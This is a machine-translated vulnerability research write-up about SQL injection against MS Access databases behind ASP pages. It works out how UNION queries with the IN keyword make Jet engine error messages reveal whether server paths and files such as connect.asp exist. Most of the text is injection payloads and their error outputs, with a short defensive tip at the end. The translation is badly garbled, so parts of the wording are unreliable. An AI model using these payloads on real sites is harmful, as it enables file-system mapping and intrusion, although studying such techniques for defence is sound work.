Another discovery for access vulnerabilities-vulnerability research

Now the SQL injection is hot, many new injection ways are dug out. Use system error to explode the path, is a hot topic, today I also gather a lively.

This example test applies to access (because the specified path does not exist for the MS SQL query), aceess has a table that can import the source database into the target database.

such as: mysource.mdb (admin table)-〉mydestion.mdb

If you want to create a new worksheet in an existing external database, you can use the In keyword. The SELECT into statement returns an error message if the external database does not exist or if the data table already exists.

SELECT * into tblnewcustomers by ' C:\Customers.mdb ' from tblcustomers.

The left and right push is not able to use the subquery function application to turn it into:

General vulnerability statements, such as SELECT * from news where id= "&request" ("id"), are injected. The following demo is tested with a set of SELECT * FROM news whre id= "&request" ("id"). For convenience, direct conversion to the state of SQL execution:

SELECT * FROM news where id=3 and SELECT * to tblnewcustomers in ' C:\Customers.mdb ' from tblcustomers

The test is not able to implement the function of the Guide table in subqueries. The road has been jammed again. Suddenly thought of union, merging operators, to see if it could be used.

Note: The UNION operator (suitable for acceess)

Although the union operation can also be considered as a merge query, we cannot technically see it as a join, and it is mentioned because it can synthesize data obtained from multiple sources into a single result form, which is similar to some types of joins. Union operations are typically used to combine data from a form, select statement, or query and omit any duplicate rows. All data sources must have the same number of fields, but these fields are not necessarily the same data types. Let's assume that we have an employee form with the same structure as the customer worksheet, so we want to combine the two worksheets to get a list of names and e-mail address information.

Select [Last name], [name], e-mail from tblcustomers UNION SELECT [last name], [name], e-mail from tblemployees

The union operation does not show any records that recur in two forms. The query statement that uses Union must be equal to the query Statement field column before the union, such as:

Select Id,title from news where id=3 UNION select * from admin

The fields of the query are unequal and return:

Microsoft OLE DB Provider for ODBC Drivers error ' 80004005 ' [microsoft][odbc Microsoft Access Driver] The number of columns in the two datasheet or query selected in the Union query does not The.

Query statements can be avoided: Select Id,title from News where id=3 UNION select 1,1 the from admin as long as the number of 1 is equal to the field, you also implement the query.

See if you can turn the statement into:

SELECT * FROM news where id=3 Union SELECT * to tblnewcustomers in ' C:\Customers.mdb ' from tblcustomers

Return:

Microsoft OLE DB Provider for ODBC Drivers error ' 80004005 ' [Microsoft][odbc Microsoft Access Driver] action query cannot be the source of a row.

As a result, it is still a failure. Because union only applies to query binding. The Union is not followed by the action. Maybe this road is out of line, think or not reconciled.

Try to use the following:

Se

Lect * FROM news where id=3 Union select * from ADMIN.C

Return:

Microsoft JET Database Engine error ' 80004005 ' could not find the file ' C:\WINNT\system32\admin.mdb '.

This proves that the path can be successfully tested with the SELECT * from news where id=3 and 0<> (select COUNT (*) from ADMIN.C). But think in this way access always defaults to detecting the suffix MDB, although there are ways to bypass it. is too much trouble.

So I wondered if it would be easier to implement it in other ways, and I would recall just select * into tblnewcustomers in ' C:\Customers.mdb ' from tblcustomers. Is the IN keyword not able to point to the path file name? Whether it can be classified as already used.

Then test:

SELECT * FROM News where id=3 Union SELECT * from admin in ' C:\Customers.mdb '

System prompts:

Microsoft JET Database Engine error ' 80004005 ' could not find the file ' C:\Customers.mdb '.

Use:

SELECT * FROM News where id=3 Union SELECT * from admin in ' C:\winnt\system32\cmd.exe '

System prompts:

Microsoft Jet database Engine error ' 80004005 ' Microsoft Jet DB engine does not open file ' C:\winnt\system32\CMD. EXE '. It has been opened exclusively by another user or does not have permission to view the data.

The implementation of this method is more concise than the knot of the query with and 0<> (*) from admin), and it is guessed that the file of the MDB suffix is correct and the information will be displayed correctly with the guessed path and filename. However, if you are guessing a file that is not an MDB, this is true:

Perform:

SELECT * FROM News where id=3 Union SELECT * from admin in ' e:\www\include\connect.asp '

Return:

Microsoft OLE DB Provider for ODBC Drivers error ' 80004005 ' [Microsoft][odbc Microsoft Access Driver] Unrecognized database format ' E:\WWW\INCL Ude\connect.asp '

To prove that the path and the document were guessed to be correct.

Something, because of the flaws in Access itself, is the way to make SQL injection in endlessly. But the big one is because programmers in the writing process, do not pay attention to guard against the careless. For the SQL with the value of the detailed filtering, at least is to block the SQL injection a door, access itself to solve the defects, a lot of French holes, we recommend that the server error information, create a web of their own error-prone, server error appears on the page. As a result, there is no reference to the error message, only some of the text as a reference.